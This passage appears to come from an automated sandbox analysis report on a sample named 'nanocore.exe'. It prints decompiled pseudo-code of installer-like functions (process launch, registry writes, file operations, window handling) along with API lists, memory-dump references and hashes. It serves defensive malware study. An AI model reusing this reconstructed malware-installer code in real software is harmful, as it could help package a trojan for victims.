            • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
            • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
            • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E00401E9C() {
            				void* _t15;
            				void* _t24;
            				void* _t26;
            				void* _t31;
            
            				_t28 = E00402A9A(_t24);
            				E00404D62(0xffffffeb, _t13);
            				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
            				 *(_t31 + 8) = _t15;
            				if(_t15 == _t24) {
            					 *((intOrPtr*)(_t31 - 4)) = 1;
            				} else {
            					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
            						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
            							E00405CFC(0xf);
            						}
            						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
            						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
            							if( *(_t31 - 0x34) != _t24) {
            								 *((intOrPtr*)(_t31 - 4)) = 1;
            							}
            						} else {
            							E0040591D(_t26,  *(_t31 - 0x34));
            						}
            					}
            					_push( *(_t31 + 8));
            					CloseHandle();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
            				return 0;
            			}

            APIs
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
              • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
              • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
              • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
            • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
            • GetExitCodeProcess.KERNEL32 ref: 00401EEB
            • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 4003922372-47812868
            • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
            • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405247(CHAR* _a4, CHAR* _a8) {
            				struct _PROCESS_INFORMATION _v20;
            				signed char _t10;
            				int _t12;
            
            				0x7a1588->cb = 0x44;
            				_t10 = GetFileAttributesA(_a8);
            				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
            					_a8 = 0;
            				}
            				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
            				if(_t12 != 0) {
            					CloseHandle(_v20.hThread);
            					return _v20.hProcess;
            				}
            				return _t12;
            			}

            APIs
            • GetFileAttributesA.KERNEL32(?), ref: 0040525A
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
            • CloseHandle.KERNEL32(?), ref: 00405290
            Strings
            • Error launching installer, xrefs: 00405247
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: AttributesCloseCreateFileHandleProcess
            • String ID: Error launching installer
            • API String ID: 2000254098-66219284
            • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
            • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004054CC(CHAR* _a4) {
            				CHAR* _t7;
            
            				_t7 = _a4;
            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
            					lstrcatA(_t7, 0x409010);
            				}
            				return _t7;
            			}

            APIs
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
            • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-3081826266
            • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
            • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E00402386(void* __eax, void* __eflags) {
            				void* _t15;
            				char* _t18;
            				int _t19;
            				char _t24;
            				int _t27;
            				intOrPtr _t33;
            				void* _t35;
            
            				_t15 = E00402B61(__eax);
            				_t33 =  *((intOrPtr*)(_t35 - 0x14));
            				 *(_t35 - 0x30) =  *(_t35 - 0x10);
            				 *(_t35 - 0x44) = E00402A9A(2);
            				_t18 = E00402A9A(0x11);
            				 *(_t35 - 4) = 1;
            				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
            				if(_t19 == 0) {
            					if(_t33 == 1) {
            						E00402A9A(0x23);
            						_t19 = lstrlenA(0x40a418) + 1;
            					}
            					if(_t33 == 4) {
            						_t24 = E00402A7D(3);
            						 *0x40a418 = _t24;
            						_t19 = _t33;
            					}
            					if(_t33 == 3) {
            						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
            					}
            					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
            						 *(_t35 - 4) = _t27;
            					}
            					_push( *(_t35 + 8));
            					RegCloseKey();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
            				return 0;
            			}

            APIs
            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
            • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
            • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
            • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CloseCreateValuelstrlen
            • String ID:
            • API String ID: 1356686001-0
            • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
            • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E00401F4B(char __ebx, char* __edi, char* __esi) {
            				char* _t21;
            				int _t22;
            				void* _t33;
            
            				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
            				_t21 = E00402A9A(0xffffffee);
            				 *(_t33 - 0x2c) = _t21;
            				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
            				 *__esi = __ebx;
            				 *(_t33 - 8) = _t22;
            				 *__edi = __ebx;
            				 *((intOrPtr*)(_t33 - 4)) = 1;
            				if(_t22 != __ebx) {
            					__eax = GlobalAlloc(0x40, __eax);
            					 *(__ebp - 0x34) = __eax;
            					if(__eax != __ebx) {
            						if(__eax != 0) {
            							__ebp - 0x44 = __ebp + 8;
            							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
            								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
            								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
            								 *((intOrPtr*)(__ebp - 4)) = __ebx;
            							}
            						}
            						_push( *(__ebp - 0x34));
            						GlobalFree();
            					}
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
            				return 0;
            			}

            APIs
            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
            • String ID:
            • API String ID: 1404258612-0
            • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
            • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E004021F6() {
            				void* __ebx;
            				char _t33;
            				CHAR* _t35;
            				CHAR* _t38;
            				void* _t40;
            
            				_t35 = E00402A9A(_t33);
            				 *(_t40 + 8) = _t35;
            				_t38 = E00402A9A(0x11);
            				 *(_t40 - 0x64) =  *(_t40 - 8);
            				 *((intOrPtr*)(_t40 - 0x60)) = 2;
            				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
            				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
            				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
            				lstrcatA(0x40a418, _t38);
            				 *(_t40 - 0x5c) =  *(_t40 + 8);
            				 *(_t40 - 0x58) = _t38;
            				 *(_t40 - 0x4a) = 0x40a418;
            				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
            				E00404D62(_t33, 0x40a418);
            				if(SHFileOperationA(_t40 - 0x64) != 0) {
            					E00404D62(0xfffffff9, _t33);
            					 *((intOrPtr*)(_t40 - 4)) = 1;
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
            				return 0;
            			}

            APIs
            • lstrlenA.KERNEL32 ref: 00402218
            • lstrlenA.KERNEL32(00000000), ref: 00402222
            • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
            • String ID:
            • API String ID: 3674637002-0
            • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
            • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040555F(CHAR* _a4) {
            				CHAR* _t3;
            				char* _t5;
            				CHAR* _t7;
            				CHAR* _t8;
            				void* _t10;
            
            				_t8 = _a4;
            				_t7 = CharNextA(_t8);
            				_t3 = CharNextA(_t7);
            				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
            					if( *_t8 != 0x5c5c) {
            						L8:
            						return 0;
            					}
            					_t10 = 2;
            					while(1) {
            						_t10 = _t10 - 1;
            						_t5 = E004054F7(_t3, 0x5c);
            						if( *_t5 == 0) {
            							goto L8;
            						}
            						_t3 = _t5 + 1;
            						if(_t10 != 0) {
            							continue;
            						}
            						return _t3;
            					}
            					goto L8;
            				} else {
            					return CharNextA(_t3);
            				}
            			}

            • Instruction addresses: 0x00405568, 0x0040556f, 0x00405572, 0x00405577, 0x0040558a, 0x004055a4, 0x00000000, 0x004055a4, 0x0040558e, 0x0040558f, 0x00405592, 0x00405593, 0x0040559b, 0x00000000, 0x00000000, 0x0040559d, 0x004055a0, 0x00000000, 0x00000000, 0x00000000, 0x004055a0, 0x00000000, 0x00405580, 0x00000000, 0x00405581

            APIs
            • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040556D
            • CharNextA.USER32(00000000), ref: 00405572
            • CharNextA.USER32(00000000), ref: 00405581
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharNext
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 3213498283-3081826266
            • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
            • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E00401D8E() {
            				void* __esi;
            				int _t6;
            				signed char _t11;
            				struct HFONT__* _t14;
            				void* _t18;
            				void* _t24;
            				void* _t26;
            				void* _t28;
            
            				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
            				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
            				 *0x4093e8 = E00402A7D(3);
            				_t11 =  *((intOrPtr*)(_t28 - 0x14));
            				 *0x4093ef = 1;
            				 *0x4093ec = _t11 & 0x00000001;
            				 *0x4093ed = _t11 & 0x00000002;
            				 *0x4093ee = _t11 & 0x00000004;
            				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
            				_t14 = CreateFontIndirectA(0x4093d8);
            				_push(_t14);
            				_push(_t26);
            				E0040591D();
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
            				return 0;
            			}

            • Instruction addresses: 0x00401d9c, 0x00401db5, 0x00401dbf, 0x00401dc4, 0x00401dcf, 0x00401dd6, 0x00401de8, 0x00401dee, 0x00401df3, 0x00401dfd, 0x00402536, 0x00401581, 0x004028d7, 0x00402932, 0x0040293e

            APIs
            • GetDC.USER32(?), ref: 00401D95
            • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
            • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CapsCreateDeviceFontIndirect
            • String ID:
            • API String ID: 3272661963-0
            • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
            • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
            				int _t19;
            				long _t23;
            
            				if(_a8 != 0x102) {
            					__eflags = _a8 - 2;
            					if(_a8 == 2) {
            						 *0x40929c =  *0x40929c | 0xffffffff;
            						__eflags =  *0x40929c;
            					}
            					__eflags = _a8 - 0x200;
            					if(_a8 != 0x200) {
            						_t23 = _a16;
            						goto L9;
            					} else {
            						_t19 = IsWindowVisible(_a4);
            						__eflags = _t19;
            						if(_t19 == 0) {
            							L12:
            							_t23 = _a16;
            							L13:
            							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
            						}
            						_t23 = E00404627(_a4, 1);
            						_a8 = 0x419;
            						L9:
            						__eflags = _a8 - 0x419;
            						if(_a8 == 0x419) {
            							__eflags =  *0x40929c - _t23; // 0xffffffff
            							if(__eflags != 0) {
            								 *0x40929c = _t23;
            								E004059BF(0x79f580, 0x7a4000);
            								E0040591D(0x7a4000, _t23);
            								E00401410(6);
            								E004059BF(0x7a4000, 0x79f580);
            							}
            						}
            						goto L13;
            					}
            				}
            				if(_a12 == 0x20) {
            					E00403DF3(0x413);
            					return 0;
            				}
            				goto L12;
            			}

            • Instruction addresses: 0x00404cad, 0x00404cca, 0x00404cce, 0x00404cd0, 0x00404cd0, 0x00404cd0, 0x00404cd7, 0x00404ce3, 0x00404d03, 0x00000000, 0x00404ce5, 0x00404ce8, 0x00404cee, 0x00404cf0, 0x00404d43, 0x00404d43, 0x00404d46, 0x00000000, 0x00404d56, 0x00404cfc, 0x00404cfe, 0x00404d06, 0x00404d06, 0x00404d09, 0x00404d0b, 0x00404d11, 0x00404d20, 0x00404d26, 0x00404d2d, 0x00404d34, 0x00404d3b, 0x00404d40, 0x00404d11, 0x00000000, 0x00404d09, 0x00404ce3, 0x00404cb3, 0x00404cbe, 0x00000000, 0x00404cc3, 0x00000000

            APIs
            • IsWindowVisible.USER32(?), ref: 00404CE8
            • CallWindowProcA.USER32 ref: 00404D56
              • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
            • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
            Uniqueness

